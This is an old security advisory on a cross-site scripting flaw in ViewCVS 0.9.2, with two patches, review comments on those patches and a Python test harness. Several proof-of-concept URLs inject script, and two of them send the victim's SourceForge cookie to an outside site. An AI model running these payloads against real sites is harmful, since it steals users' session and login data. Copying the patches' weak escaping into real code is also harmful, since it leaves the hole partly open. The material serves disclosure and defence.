
ViewCVS cross-site scripting bug
21st May 2002 [SBWID-5353]
COMMAND

	ViewCVS cross-site scripting bug

SYSTEMS AFFECTED

	ViewCVS 0.9.2 and below
	

	

PROBLEM

	office [http://www.office.ac/] says:
	

	ViewCVS is a WWW interface for CVS repositories. It is widely used in the
	free software and open source communities. Unfortunately, it has a
	cross-site scripting vulnerability.
	

	

	 Proof
	 -----

	

	If you access a URL like:

	http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>

	http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

	

	The former URL is valid for Internet Explorer 6.0 and Opera 6.01, but not
	for Netscape 4.78, Netscape 6.2.2 or Mozilla 0.9.9 on Windows XP. All
	these URLs can do is make a popup window appear.
	

	

	 Example
	 -------

	

	For example, you can see the vulnerability at SourceForge.net (the
	vendor's site is on SourceForge.net).
	

	If you access the following sample URL, your cookie (including your
	login information and session information about SourceForge.net) is
	stolen by my site (http://www.office.ac).
	

	The stolen cookie information from Internet Explorer 6.0 includes your
	login information and session information about SourceForge.net. But
	the stolen cookie information from Opera 6.01 and Mozilla 0.9.9 includes
	only the user name, and the cookie information from Netscape 4.78 and
	6.2.2 is empty. (I don't know why.)
	

	http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

	http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

	

	The ViewCVS at SourceForge.net is not the newest version. You can see
	the vulnerability in the newest version of ViewCVS at GNU.
	

	http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert("hello")</script>

	http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>

	

SOLUTION

	No official patch yet; check the unofficial ones below:
	

	Patch by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper NIKKI System
	Project (http://www.h14m.org/).
	

	--- viewcvs.py.orig	Fri Dec 14 23:14:39 2001

	+++ viewcvs.py	Sun Mar 31 15:24:34 2002

	@@ -172,7 +172,7 @@

	     # parse the query params into a dictionary (and use defaults)

	     query_dict = default_settings.copy()

	     for name, values in cgi.parse().items():

	-      query_dict[name] = values[0]

	+      query_dict[name] = cgi.escape(values[0])

	     # set up query strings, prefixed by question marks and ampersands

	     query = sticky_query(query_dict)
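	Review bot: `cgi.escape(values[0])` is called without the `quote` argument, so it converts only `&`, `<` and `>` and leaves `"` untouched; the second proof-of-concept in this advisory (`sortby=rev"><script>...`) relies on `"` to close a quoted attribute, so a value written into an attribute is still able to terminate it even though the `<script>` tag itself no longer forms. Use `cgi.escape(values[0], 1)` (quote mode) or, better, escape at the point where `query_dict` values are written into HTML. Escaping at parse time also rewrites values ViewCVS uses outside HTML (for example `cvsroot` as a repository key), so a legitimate value containing `&` would stop matching.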

	

	

	This code comes from Taku YASUI <tach@sourceforge.jp> / Sourceforge.jp
	(http://sourceforge.jp/), who offered the former patch to the ViewCVS
	team.
	

	RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v

	retrieving revision 1.107

	retrieving revision 1.108

	diff -u -r1.107 -r1.108

	--- viewcvs/viewcvs/lib/viewcvs.py	2002/02/22 09:20:46	1.107

	+++ viewcvs/viewcvs/lib/viewcvs.py	2002/04/01 01:32:16	1.108

	@@ -180,8 +180,14 @@

	     # parse the query params into a dictionary (and use defaults)

	     query_dict =3D default_settings.copy()

	+

	+    # RE that ViewCVS doesn\'t use in any URL, but a CSS attack might

	+    re_url_validate =3D re.compile(\'\\\'|\"|<|>\')

	     for name, values in cgi.parse().items():

	-      query_dict[name] =3D values[0]

	+      # do not accept values that contain non-ViewCVS characters

	+      # except for search

	+      if not re.search(re_url_validate, values[0]) or name =3D=3D \'search\'=

	:

	+        query_dict[name] =3D values[0]

	     # set up query strings, prefixed by question marks and ampersands

	     query = sticky_query(query_dict)
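	Review bot: as pasted, this hunk is quoted-printable encoded (`=3D` stands for `=`, and the trailing `=` on the `if` line is a soft line break that splits `name == 'search':` over two lines), so it has to be decoded before `patch` will apply it. Substantively, `re_url_validate` is a denylist of four characters, a rejected value is dropped silently so `query_dict[name]` keeps the default with no error to the user or the log, and the `search` exemption passes that parameter through unescaped and depends entirely on the output side to escape it. An allowlist per parameter (for instance restricting `sortby` to the sort keys ViewCVS actually accepts) combined with escaping at output time would cover both cases.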
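	As an added worked example (not code from the advisory, from ViewCVS, or from either patch author), the Python 3 snippet below rebuilds the query-parsing loop that both patches modify and applies each patch's strategy to inputs shaped like the advisory's two popup-only proof-of-concept values. It assumes `html.escape` in place of the Python 2 `cgi.escape` the first patch calls (same `&`, `<`, `>` handling; `quote=False` mirrors `cgi.escape`'s default), and `render_sort_link` is a hypothetical output site standing in for wherever ViewCVS writes `sortby` into an attribute.

```python
import html
import re

# Constructed inputs shaped like the advisory's two popup-only proof-of-concept values.
SAMPLE_CVSROOT = '<script>alert("hello")</script>'
SAMPLE_SORTBY = 'rev"><script>alert("hello")</script>'

# Same regex as the Sourceforge.jp patch: characters ViewCVS never uses in a URL.
RE_URL_VALIDATE = re.compile(r"'|\"|<|>")


def render_sort_link(sortby):
    """Hypothetical output site: the value lands inside a quoted href attribute."""
    return '<a href="?sortby=%s">sort</a>' % sortby


def escape_like_patch1(value, quote=False):
    """First patch: HTML-escape every value at parse time.
    quote=False mirrors cgi.escape's default, which leaves '"' untouched."""
    return html.escape(value, quote=quote)


def validate_like_patch2(name, value, default):
    """Second patch: drop values containing non-ViewCVS characters
    (except for the 'search' parameter) and keep the default instead."""
    if name != 'search' and RE_URL_VALIDATE.search(value):
        return default
    return value


def parse_query(params, defaults, strategy):
    """Rebuild query_dict the way the patched viewcvs.py loop does.
    params: {name: [values]} as cgi.parse() returns it; strategy: 'escape' or 'validate'."""
    query_dict = defaults.copy()
    for name, values in params.items():
        if strategy == 'escape':
            # quote=True closes the attribute gap that cgi.escape's default leaves open.
            query_dict[name] = escape_like_patch1(values[0], quote=True)
        else:
            query_dict[name] = validate_like_patch2(name, values[0], defaults.get(name))
    return query_dict


def attribute_intact(rendered):
    """True when nothing broke out of the href: no tag was opened and only the
    two quotes of the attribute itself remain."""
    return '<script' not in rendered and rendered.count('"') == 2
```

	Running the three variants of `SAMPLE_SORTBY` through `render_sort_link` shows the raw value and the `quote=False` escaping both leave the attribute broken, while `quote=True` or the regex rejection keeps it intact.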

	

	
